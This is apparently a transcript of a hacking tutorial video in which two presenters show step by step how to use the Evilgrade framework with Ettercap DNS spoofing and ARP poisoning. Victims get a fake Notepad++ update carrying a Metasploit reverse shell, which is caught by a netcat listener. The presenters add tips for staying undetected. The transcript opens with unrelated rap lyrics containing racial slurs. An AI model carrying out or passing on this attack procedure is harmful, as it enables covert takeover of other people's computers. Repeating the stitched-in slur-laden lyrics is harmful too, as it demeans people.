friendly. It goes a little something like this. Fuck the police coming straight out the underground. A young nigga got his badge cause I'm proud. And I'm the undercover, so police think they have the authority to kill a minority. Fuck that shit, cause I ain't the one for a punk motherfucker with a badge and a gun to be beaten on and thrown in jail. We can go toe to toe in the middle of a cell. Fucking with me, cause I'm a teenager with a little bit of gold and a pager. Put in my car, think of Americana.
Hey, what's up, guys? This is LCN Crew's first video. I'm Copy.
I'm Spitfire.
Alright, and today what we're going to do is we're going to show you how to use Evilgrade. Now, what Evilgrade is it's this new framework developed in Perl by Infobyte, and it allows you to spoof updates.
Yeah, so you can use DNS spoofing or ARP provisioning. We found that DNS spoofing works better though, so that's what we're going to show you how to do.
Yeah, and it works by using different modules. Each module represents sort of a different application that you use for updating, such as iTunes or Notepad, WinZip, or a Java plugin. And after you've loaded the module and such, you then find the server in which the application downloads from, and you pretty much just spoof that. That way, when the user goes and updates, they will, instead of updating an actual Java plugin or iTunes update, they will get a backdoor or a rootkit. And then you pretty much just own them.
Yep.
Alright.
Basically ass rip them.
Kind of.
Hard.
In the ass. Alright, so the first thing you need to do is actually download Evilgrade. So just make sure that your internet's up. Make sure you have a valid IP, otherwise none of this will work. Next thing you want to do is go to www.infobyte.com.ar. What you want to do then is download the tar. Alright, now that it's downloaded and saved to the root folder, what we want to do is decompress it by just typing tar z x v f and then the file. To actually access Evilgrade, you're going to type /Evilgrade. This will run the framework. Alright, so now that we're in Evilgrade, there's a series of different options you can use. For example, if you want to show the modules, you'll type show modules. And as you can see, there's all kinds of different upgrades that we could spoof. Today we're going to use Notepad+, which is a developer's version of Notepad. So we're going to type config Notepad+. Show options will show all the options. So we can see the virtual host, which is the SourceForge, and the agent which we're going to inject. To set the agent, what we're going to do is type set agent, and then we're going to do 1 parentheses, bar, parentheses, dot, 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 and then we're going to close it with parentheses, bar, 1 parentheses, and that's pretty much how you set up an agent. So we're going to actually use the agents, we're going to use payloads from the Metasploit payload collection, which there's a vast majority of different things that you could do, but we're probably just going to use a simple shell. So, as you can see, there's a lot of different payloads we could possibly use. So we're going to use the one that's called Windows Reverse TCP Shell. Or Shell Reverse TCP. So to set the agent, we're going to use our little nifty string insert, which is the parentheses, bar, parentheses, and then we're going to put the location of the MSF payload, which is Pentest Exploits Framework 3 MSF payload. And then we're going to actually put space Windows slash shell reverse TCP. We're then going to set the L host, which is going to be our IP address, 192.168.1.16, and then the port that we want it to connect to. What this is going to do is when the victim opens up the packet, it's going to connect back to us. We're then going to type X, large alligator thing, and then what this will do is it'll then save the payload into a binary file, which we locate as under the TMP folder as a.exe. Alright, so now that's all set. The next thing we want to do is DNS spoofing.
Now, in order to complete this, you need some background knowledge in DNS spoofing. If you want to pick this up, you should probably watch the Eatercap video on infinityexist.com. You need to modify the eater.dns file, which can be found under the Eatercap directory. Just delete all the junk in the file that we're not going to use. Alright, now you're going to want to copy the URL that the application downloads from, and you want to paste it in the eater.dns file. Then put in your IP address and save the changes to the file. Alright, now you're going to want to start Eatercap, and then you're going to want to pick your victim host, and then the default gateway. Alright, now you're ready to begin your man-in-the-middle attack, and we're going to use art poisoning in this video. Don't forget to enable DNS spoofing.
Alright, now before we begin the actual attack, we need to make sure that we're listening when the reverse shell tries to connect. To do this, just open up a new shell, and we're going to use netcat. Just type nc-l-v-p, and then the port that we used, which is 4141. Alright, now we're actually ready to start, so just type start in the framework. What this will do is it'll enable the web server, set it all up so we can actually spoof the upgrade and be all evil.
This is what the victim computer is going to look like. Open up Notepad+, and as you can see, the update was spoofed. Just accept the update, and that is all.
And back over at the attacker computer, we can see that the requests were sent, and we spoofed the download by sending the exe that we had created. And if we pop over to the netcat tab, we can see that we actually have a shell. So now we can own them. Now, we used a reverse shell for this, but you can send pretty much any Metasploit payload or any creation of your own, and it should work. Just make sure that it's pretty discreet and that it doesn't pop up with anything. Also, if you make a mistake while in the shell, it will alert on the victim computer and not on the actual shell. So like where I typed ls instead of dir, the error showed up on the actual victim computer. which would be a dead giveaway if you were actually trying to hack anybody, which we don't recommend because, you know, it is kind of illegal and such. So, yeah. This has been LCN Crew. I'm Copy.
I'm a Spitfire.
And take it easy.
Don't do drugs.